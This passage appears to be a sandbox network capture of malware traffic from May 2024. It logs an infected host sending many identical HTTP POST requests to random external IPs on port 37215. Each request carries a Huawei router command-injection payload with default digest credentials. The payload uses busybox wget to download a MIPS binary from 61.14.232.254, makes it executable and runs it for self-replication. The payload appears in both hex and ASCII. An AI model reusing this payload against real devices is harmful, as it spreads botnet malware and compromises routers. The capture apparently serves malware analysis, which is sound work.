6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  896192.168.2.1353208157.86.47.9337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.443011045 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  897192.168.2.1346716157.5.130.20537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.443033934 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  898192.168.2.133684441.206.238.4337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.443083048 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  899192.168.2.135759641.176.115.9937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.443114996 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  900192.168.2.1355754157.28.246.037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.443131924 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  901192.168.2.1341444197.80.77.1637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.443151951 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  902192.168.2.133365841.13.90.10637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.443171024 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  903192.168.2.1347782157.145.44.1837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.443190098 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  904192.168.2.1339806157.102.225.10337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.443294048 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  905192.168.2.1345370197.44.109.21437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.443346977 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  906192.168.2.1350080157.216.71.18337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.443969965 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
